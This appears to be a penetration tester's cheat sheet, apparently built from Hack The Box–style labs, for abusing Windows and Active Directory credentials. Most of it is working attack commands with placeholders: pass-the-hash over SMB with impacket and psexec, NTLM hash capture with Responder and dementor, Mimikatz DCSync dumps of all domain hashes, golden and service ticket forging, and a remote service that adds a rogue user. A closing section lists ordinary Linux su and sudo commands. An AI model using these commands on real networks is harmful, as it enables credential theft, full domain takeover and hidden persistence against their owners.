Credentials

Using Credentials

Check For Stored Credentials

cmdkey /list
 


Use Stored Credentials:

runas /user:administrator /savecred "cmd.exe /k whoami"



Access SMB With Credentials:

python  /usr/share/doc/python3-impacket/examples/smbclient.py  <Domain>/<user>@<ip> -hashes  <part1>:<part2>



In Metasploit
use auxiliary/scanner/smb/smb_login 



crackmapexec <ip(s)> -d <domain> -u <user> -p <pass>
exploit/windows/smb/psexec



Map A Drive

net use z: \\<ip>\c$ /user:<username> <password>
 


Gain A Hash

1.) Start responder Be sure to include --lm
responder -I tun0 --lm

2.) Issue dementor to obtain an ntlm response
proxychains python dementor.py -d htb.local -u <user> -p <password> <target ip> <listening ip>

 l


METERPRETER KIWI

Get Hash As Domain Admin (kiwi):

dsync_ntlm <domain>\\<user>
 

Create Golden Ticket (kiwi):

golden_ticket_create  -d <domain> -k <krbtgt hash> -s <domain-sid> -u  <name, does not have to exist (but can)> -t <filename>
 


Create Skeleton Ticket With Impacket

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain OsbornePro DEV\$

     OR

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain HTB DEV

OR

python  ticketer.py -nthash <hash> -domain-sid  <sid> -domain OsbornePro -spn cifs/<ip> <username>



USE THAT CREATED SKELETON TICKET:

1.) Set Value

export KRB5CCNAME=/root/Downloads/Tickets/OsbornePro.cache


2.) Edit krb.conf File

nano /etc/krb5.conf
# CONTENTS

[realms]
       DOMAIN.COM = {
               kdc = dev.domain.com
               kdc = web.domain.com
               kdc = dc.domain.com
               admin_server = dc.domain.com
}

3.) Connect To Target

proxychains smbclient \\\\<IP>\\C$ -U <user> -C -N



 Create A Service To Exploit:

1.) Create A Service To Make A User

python  /usr/share/doc/python3-impacket/examples/services.py -dc-ip <ip of  domain controller> -k -no-pass <ip of target> create -name  <username> -display <username> -path 'net user  <username><password> /add'


2.) Check The Service Values
proxychains /usr/share/doc/python3-impacket/examples/services.py -dc-ip  <DC IP> -k -no-pass <targetIP> config -name  <createduser>


3.) Start The Service To Execute Command
proxychains python /opt/ActiveDirectory/impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <TargetIP> start -name <username>
 


Use Golden Ticket (kiwi):

kerberos_ticket_use <filename>
 


Dump Domain Hashes With DCSync:

log
lsadump::dcsync /domain:<domain> /all /csv
 


Create Golden Ticket Mimikatz:

kerberos::golden  /user:<name> /domain: <domain> /sid:<domain-sid>   /krbtgt:<krbtgt hash> /ticket:<filename> /groups:<comma  seperated groups this 'virtual' user is part of
 


Use Golden Ticket Mimikatz:

kerberos::ptt <filename>


====================

LINUX

====================

Become another user

  su <username>


Become root User:

su -

OR

su root



Execute Command As Root:

sudo <command> 


Execute Command As Another User:

sudo -u <username> <command>